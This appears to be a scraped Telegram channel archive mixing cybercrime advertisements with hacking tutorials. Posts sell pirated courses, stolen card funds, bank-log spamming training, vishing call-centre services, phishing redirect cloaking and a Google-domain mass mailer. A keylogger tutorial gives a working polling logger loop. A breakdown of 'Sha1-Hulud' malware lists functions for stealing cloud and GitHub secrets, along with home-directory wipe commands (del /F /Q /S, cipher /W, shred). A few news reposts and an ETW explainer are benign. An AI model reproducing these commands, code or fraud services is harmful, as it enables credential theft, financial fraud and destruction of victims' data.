ar
Feedback
☘️ { 𝔖𝔠𝔞𝔯𝔩𝔢𝔱𝔱𝔞'𝔰 𝔏𝔬𝔲𝔫𝔤𝔢 } ☘️

☘️ { 𝔖𝔠𝔞𝔯𝔩𝔢𝔱𝔱𝔞'𝔰 𝔏𝔬𝔲𝔫𝔤𝔢 } ☘️

قناة بسيطة

🧪 𝕋𝕌𝕋𝕆ℝ𝕀𝔸𝕃𝕊 𝔸𝔹𝕆𝕌𝕋 𝔼𝕍𝔼ℝ𝕐𝕋ℍ𝕀ℕ𝔾🧪 You search how to setup windows on VM, what credit reports are or how checks work? We show you practical ones to understand ⚠️ Unauthorized advertisments in comments will lead to a ban from channel :)

إظهار المزيد
لا توجد بيانات
المشتركون
+724 ساعات
+657 أيام
+16630 أيام
أرشيف المشاركات
Hackers Arise has been dumped and uploaded on Telegram. The entry for the channel is $15. Hackers Arise want for one single c
+2
Hackers Arise has been dumped and uploaded on Telegram. The entry for the channel is $15. Hackers Arise want for one single course over $100. Respect the export & upload work and dm me if you want to join. @scarlettaowner. Timewasters will be blocked and banned from the channel. Course Catalog: https://hackersarise.thinkific.com/collections

Buying Enroll/Self-Reg CC funds @50-60%
Serious niggas can dm
@rapist7

⌨️ Introduction to Keylogging Keylogging = capturing keyboard input at a low-level, before (or after) Windows processes it into characters. To understand or analyze keyloggers, you must understand how Windows converts raw hardware events → characters → application messages. 🔽Input Flow Inside Windows
[Keyboard hardware]
   ⬇️ produces scan code
[Keyboard driver / KBD class driver]
   ⬇️ maps via layout DLL (kbdus.dll, kbdgr.dll, etc.)
[Virtual-Key code generated]
   ⬇️ Window Message Queue
WM_KEYDOWN / WM_KEYUP → application
So a keypress travels through these stages: ▶️Scan Code: Physical key position, hardware-defined, layout-agnostic ▶️VK Code: OS-standardized, layout-aware identifier ▶️WM Messages: Delivered to focused window, what most applications receive ▶️Character Output: Result after modifiers applied (Shift, Caps, AltGr, IME…) Why this matters: A keylogger can hook ANY of these stages → earlier = more raw, later = more human-readable. 🧬 Scan Codes - Hardware-Level Identity ▶️Unique number per key on keyboard matrix ▶️Break code sent when key released (scan + 0x80) ▶️Extended codes (0xE0, 0xE1) = special keys (Insert, Arrow keys, Ctrl, Fn combos) Example: Key: A Make Code: 0x1E Break Code: 0x9E Key: Delete Make Code: 0xE0 0x53 Break Code: 0xE0 0xD3 Raw scan codes allow loggers to bypass layout confusion. 🔠 Virtual-Key Codes (VK) VKs = interpreted meaning of a key after layout mapping. ▶️A = VK_A (0x41) ▶️Enter = VK_RETURN (0x0D) ▶️Shift = VK_SHIFT (0x10) Stable across hardware → ideal for keylogging logic. 🌍 Keyboard Layout Mapping Windows stores mapping inside keyboard layout DLLs (kbdus.dll, kbdgr.dll, etc.). The same scan code → different VK based on layout: Scan: 0x15 US: Y DE: Z Scan: 0x2C US: Z DE: Y APIs that convert codes:
MapVirtualKeyW(vk, MAPVK_VK_TO_VSC);
MapVirtualKeyW(sc, MAPVK_VSC_TO_VK);
This is key for logging readable output correctly. 🧠 Key-State Retrieval with GetAsyncKeyState()
SHORT s = GetAsyncKeyState(VK);
0x8000: Key is currently held | 0x0001: Key was pressed at least once since last check Poll-based detection:
if (GetAsyncKeyState(VK_X) & 0x8000) { /* currently down */ }
if (GetAsyncKeyState(VK_X) & 0x01)   { /* single press */ }
Why 0x01 is often better for loggers: ✔️ Prevents duplicate writes if key is held ✔️ Captures fast keystrokes between polling intervals 🔍 Basic VK → SC Poll-Based Logger (clean & minimal)
for (int vk = 8; vk < 256; vk++) {
    if (GetAsyncKeyState(vk) & 0x01) {
        printf("[KEY] VK:%02X  SC:%02X\n",
               vk, MapVirtualKeyW(vk, MAPVK_VK_TO_VSC));
    }
}
Sleep(50);
This demonstrates logging, but real research keyloggers: 🔸 decode characters (ToUnicodeEx) 🔸 track modifiers (Shift, Ctrl, CapsLock) 🔸 resolve dead keys + locale differences 🔸 handle IME layouts, multi-byte input Future depth would cover these safely. Defensive Value of Understanding This 🔹Detect polling-based keyloggers via abnormal input-read loops 🔹Monitor GetAsyncKeyState, SetWindowsHookEx, RawInput usage 🔹Compare scan-code vs virtual-key mapping anomalies for abuse 🔹Identify suspicious layout DLL loading or IME manipulation 🔹Spot processes reading keystate without window focus

Looking for cheap Indian Web devs js need a small basic HTML website with animations (no AI) + perfect SEO on Google search @rapist7

Repost from REGGIEs VAULT
For those of you that want to learn spamming and get your own bank logs, I will be taking you one on one training. 💥 Get ur own results first hand ✅ Learn how to spam your bank logs on your own ✅ Master methods for extracting databasesValidation of leads! ✅ Get free access to professional programs and a variety of brute force programsComplete comprehensive training from A to Z — no gaps or guesswork no experience needed! 2 weeks of training and a some software package 📌 Spots are limited. Start today hurry to be among the chosen few! This training is beginner friendly, you don't need any dev experience to learn spamming. Copyright ©️ @OG_Reggie, Inc All rights reserved.

Hackers Arise has been dumped and uploaded on Telegram. The entry for the channel is $15. Hackers Arise want for one single c
+2
Hackers Arise has been dumped and uploaded on Telegram. The entry for the channel is $15. Hackers Arise want for one single course over $100. Respect the export & upload work and dm me if you want to join. @scarlettaowner. Timewasters will be blocked and banned from the channel.

Outflank - C2 Tool Collection This repository contains a collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques. https://github.com/outflanknl/C2-Tool-Collection

☎️☎️☎️☎️☎️☎️☎️☎️ ☎️☎️☎️☎️☎️☎️☎️☎️ ➡️ CΑLL CΕΝΤRΕ №1 📞📞📞📞📞📞
🇩🇪 German 🇺🇸 Εnglish 🇵🇱 Ροlish 🇪🇸 Spanish 🇮🇹 Ιtalian 🇨🇳 Chinese 🇫🇷 French
7 years οf experience in cοld calling 📞 We call bvnks, pvyment prοcessοrs, lοvn services, cοuriers, shοps, airlines, hοtels, vics, and the drοp's mοm. 🔓 We lift lοcks with calls, update infοrmatiοn, push transactiοns, verify and check data, rerοute and reissue cards, replace and refund packs, place οrders, and hοld reservatiοns, wοrking οn scvm 1.0 and 2.0.
✈️ DΜ SUΡΡΟRΤ FΟR CΑLLS!
✅ We take οn tasks οf any cοlοr and cοmplexity! Discοunts οn depοsits, scvm calls at a reduced rate! Τelegram killing channels! Dive in fast, dοn’t vanish! ✈️ Advertisement 💎

🔥 BlockBotter Redirect, Cloak & Anti-Bot 100% Inbox to office and others all domain. Create redirect instantly Buy Redirect
🔥 BlockBotter Redirect, Cloak & Anti-Bot 100% Inbox to office and others all domain. Create redirect instantly Buy Redirect Here : https://blockbotter.ioFeatures • Instant Redirect link Created • Anti-Bot System • Email Auto-Grab • Encrypted Redirects • Smart CAPTCHA • Real-Time Analytics • Custom Domains + API • Link Monitoring Alerts • Redirect Script Generator • Cloak Service • IP Lookup (API) Get it here: https://blockbotter.io 📩 Contacts Support → @BlockBotterSupport Join → @BlockBotter

🛰 Event Tracing for Windows (ETW) What is ETW 🤨 ▶️ETW is a built-in Windows system that records everything important happening on the machine - from loading DLLs to opening files. 👉Both user-mode apps and kernel drivers generate events, and Windows stores them in log files. 💡 Because ETW captures so much detail, it's one of the strongest tools defenders have when checking for attacks or suspicious activity. Most security tools also subscribe to ETW in real time to catch malicious behavior instantly. 🏗 ETW Architecture (4 Parts) 1️⃣ Providers ▶️The sources that generate events ▶️Can be apps, drivers, or Windows itself ▶️Each has a unique GUID ▶️List them with: logman query providers 🧩 Think of providers as "event creators". 2️⃣Tracing Sessions ▶️Containers that collect events ▶️They receive events from providers ▶️Can log to a file or send data to a real-time consumer ▶️View running sessions: logman query -ets 📦 Like a "bucket" that holds event data. 3️⃣ Controllers ▶️Start/stop/configure tracing sessions ▶️Control what providers send events 🎮 Basically the "remote control" for ETW logging. 4️⃣ Consumers ▶️Apps that read the events from a tracing session ▶️A session can run even if no consumer is connected ▶️One consumer can read from multiple sessions 👀 These are the "event readers" or analyzers. 🔗 Link : https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/event-tracing-for-windows--etw-

Repost from THE MONARQ UPDATES
TEXTNOW TUT • ISP: VERIZON BUSINESS • FRESH EMAIL (DOMAIN MAIL) • CHANGE REGION, DATE & TIME TO YOUR ISP CITY. GOOD LUCK 🍀

Sha1-Hulud Malware V2 Source Code 👩‍💻 🟡GitHub Persistence / Token Theft 🟡AWS Credential Harvesting 🟡GCP Secret Manager Theft 🟡Azure Vault Secret Theft 🟡DNS Hijack in GitHub Actions 🟡Repo-Creation as Exfil-Channel 🟡NPM Token Extraction 🟡Local Secrets Scanning 🟡Wipe-Your-Home-Directory Kill-Switch 🟡Firewall Manipulation 🟡Actions Runner Dropper 🟡"Bun" Installer Stub 🟡TruffleHog Scanner (for extra Secrets) GitHub Actions Hijack 👩‍💻
installDnsHijackAndOpenFirewall()
⚙️ DNS manipulation + iptables flushGoal: Force GitHub Runner into a controlled environment. GitHub Token Steal + Repo as "C2" 👩‍💻 Exfiltration of all GitHub secrets:
exfiltrateAllAccessibleSecrets()
⚙️ Reads repo list → Writes actionsSecrets.json to repo Repo creation with runner backdoor
github.createRepo(secureId())
⚙️ Creates repo ⚙️ Registers Actions runner "SHA1HULUD" NPM Token Hijack 👩‍💻 Function: extractNpmToken() ⚙️ Searches .npmrc in $HOME & CWD AWS secrets theft 👩‍💻 🟡Uses official AWS SDK client 🟡Google Cloud secret theft 🟡Uses @google-cloud/secret-manager Azure secret theft 👩‍💻 🟡Uses Azure KeyVault secrets System report + environment dump 👩‍💻
environmentDump = { environment: process.env }
⚙️ exfiltrates all ENV variables ("CICD Secret Dump") Home Directory Secret Scanner 🔍
scanHomeForSecrets(github)
⚙️ searches $HOME for files ⚙️ uploads everything to the repo Local Kill Switch (Data Destruction) 🗑 If it doesn't get any tokens, then: 🔷 Windows:
del /F /Q /S “%USERPROFILE%*” 
rd /S /Q
cipher /W:%USERPROFILE%
🔲 Linux:
find $HOME -type f -writable ... shred -uvz
find $HOME -empty -delete
⚠️ This is a complete personal data wipe. TruffleHog scanner for extra secrets ⌨️ The entire TruffleHog installer + binary downloader is contained in the script. ⚙️ Additionally scans for API keys/passwords in the file system. Bun Installer Dropper 👩‍💻 The huge code block for installing bun + environment reload 👤 Deobfuscator: @scarlettaowner ❤️ Channel: https://t.me/+ZcWpNaZALkIxYjUy

Repost from .
Qilin Ransomware Hits South Korea in Major Supply-Chain Breach A compromised managed service provider triggered a widespread
Qilin Ransomware Hits South Korea in Major Supply-Chain Breach A compromised managed service provider triggered a widespread Qilin ransomware outbreak across South Korea’s financial sector, affecting 25 firms in September 2025, Bitdefender says. The campaign, dubbed “Korean Leaks,” leaked 1 million+ files from 28 victims and used unusually political messaging before shifting to typical extortion. Qilin, responsible for nearly 30% of global ransomware attacks, may have worked with a North Korean affiliate. The incident highlights growing risks from MSP breaches and the need for stronger security controls. Report HereNews / PrivRDP / PrivRDP Bot

Repost from The Hacker News
🚨 FBI ALERT: Scammers are posing as banks to steal logins — causing $262M in losses this year. Now they’re using AI to creat
🚨 FBI ALERT: Scammers are posing as banks to steal logins — causing $262M in losses this year. Now they’re using AI to create fake Black Friday sites and ads that look real. They trick people into handing over passwords and money. Learn more ↓ https://thehackernews.com/2025/11/fbi-reports-262m-in-ato-fraud-as.html

@google.com mailer - Telegram Bot Based 🔍 Specification: 1. There is no limit to sending. 2. It can send upto 50 emails in a single send. 3. It supports both HTML and Plain Text 4. IT IS NOT A SPOOFED EMAIL SENDER THE HEADERS AND MX SERVERS ARE GOOGLE'S OWN IT IS "*****@GOOGLE.COM" signed by “google.com Sale plan: -- Access Fee: $1.2k + 10% of hits The Pricing is fixed at $7,500 for the source code which comes with setup instructions
Testing is only available after payment to the MM or POF
Contact - @FirePortals Page - @P1Dialer

Updates: - changed API Endpoint to /events - avoided DOM removal when trying to print it - patched other sendEvent tasks Warning: They added a HTML <script>-Tag which will check if the domain is maldevacademy.com or not. If you open the File offline, you will be report to them. So remove the script tags. Installation process: Download Tampermonkey, then import the script (either copy the code and paste it or drag the javascript into the dashboard of Tampermonkey). https://tampermonkey.net

☘️ { 𝔖𝔠𝔞𝔯𝔩𝔢𝔱𝔱𝔞'𝔰 𝔏𝔬𝔲𝔫𝔤𝔢 } ☘️ - إحصائيات وتحليلات قناة تيليجرام